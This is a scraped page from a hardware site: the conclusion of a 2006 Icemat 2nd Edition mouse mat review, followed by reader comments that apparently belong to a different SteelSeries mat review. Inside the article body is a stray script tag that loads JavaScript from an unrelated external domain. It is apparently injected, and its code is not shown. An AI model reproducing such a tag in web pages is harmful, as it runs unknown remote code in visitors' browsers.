Icemat 2nd Edition Mouse Mat

Conclusion

<script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 19/06/2006
Author: Dave Stevens (Dav0s)
Hardware Acquired: Icemat 2nd Edition


Conclusion

Of course every mouse mat will take time to get used to, and it has taken me a while to adjust to the new glass surface, however I am glad I have done so. I would recommend the Icemat to any serious gamers out there, as its balance of speed and control is not found on many other leading brands, and it certainly gives you an edge over opponents when you need to adjust where your cursor goes on the fly.

The only downside I can find is that which I mentioned earlier, sometimes the rubber feet are just not enough to keep the pad in place, and I find myself moving it with my forearm, however this all depends on your desk surface, and how you handle your mouse. I recommend just taking a second to see if you apply a lot of forward pressure on your mousemat before purchasing.

Even this slight problem however does not take away how unbelievably well manufactured the Icemat 2nd Edition is. I can say without doubt that if Icemat put this much effort into all of their products, then they will go far as a company.

Overall, for a gaming peripheral, do not be fooled into thinking that a mousemat cannot improve performance, as this is most definitely not the case. I urge you to go out and buy an Icemat, and see for yourself how much it can change your game. Also do not forget how great it looks on your desk.

To summarise...

Pro's

+ Looks great
+ Performs Amazingly
+ Perfect Speed/Precision Balance
+ Includes Padsurfers

Con's

- Rubber Feet do not cement the mousemat to the desk
- Does not perform without the Padsurfers
- Expensive, although worth it





A big thanks to Icemat for the product sample.

The Icemat 2nd Edition, can be purchased from Kustom PC's for £24.95
«Prev 1 2 3 4 Next»

Most Recent Comments

29-06-2007, 12:32:31

JN
"Chris "Ins" Buer is back with a world exclusive look at the latest technological breakthrough by SteelSeries. We go beneath the "surface" to bring you the new SteelSeries SX mouse mat."

http://www.overclock3d.net/gfx/artic...141438737s.jpg

Linkage

29-06-2007, 12:40:33

Ham
Another nice job ins.

One thing, you havn't mentioned the price (or expected price) anywhere, just that its expensive...

29-06-2007, 12:41:07

mVp24
Great review INS! This pad seems interesting

PS: We need a thumbs up smiley...

29-06-2007, 14:39:02

[Ins]
I don't think the pad has been released yet in the UK so price is to be tba. However the marketing I received with the pad stated that it was aimed at the "pro gamer" and as a result would be priced at the higher end of the market.

29-06-2007, 15:09:48

equk
nice review.

hopefully these alu mats will last longer than the old ones as mine (4S) wore out within 5-6months

I also laugh at this "pro gamer" "pc enthusiast" etc marketing.

29-06-2007, 15:26:50

AydST
aye not in the UK yet is correct, last time I checked I was told a month or so but I'll confirm on Monday

30-06-2007, 10:21:24

MikeEnIke
Its a great reviews Ins. Wouldn't ever get it meself, but good review nonetheless

30-06-2007, 10:36:26

flib
Nice review Was contemplating getting a new gaming mouse mat and recently looking into the Razer eXactmat, but this one looks great too. Just hopefully not *to* expensive.

30-06-2007, 10:59:20

equk
A few things I noticed with my steelpad 4S:



  • It was cold

  • It was hard and uncomfortable

  • It had no friction (you need a little at least)

  • It cost me loads in teflon strips

  • It wore out and went shiney within 5months



I have some images somewhere.

I know some people like hard mats, but to spend so much on something that only lasts a few months is a waste imo.

30-06-2007, 14:42:04

FarFarAway
My Icemat has lasted me bloody ages (at least a 1.5yrs) and even after trying other pads I always come back to it as the most comfortable for me

30-06-2007, 15:15:47

Rastalovich
It`s a great review, in something I`m clearly never hopefully gonna be in the market for.

`Hopefully` cos they`ve stopped making the trackballs I use and there is no clear general purpose replacement out there atm

Gotta be wholey important for the avid fps game tho I can appreciate.

30-06-2007, 15:49:53

equk
Quote:
Originally Posted by name='Kempez'
My Icemat has lasted me bloody ages (at least a 1.5yrs) and even after trying other pads I always come back to it as the most comfortable for me
I've heard loads of people praise the icemat I guess they are made of more sturdy material tho.

02-07-2007, 16:56:11

prosser13
Nice review, I got an awesome deal on my Steelpad S&S and love it
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.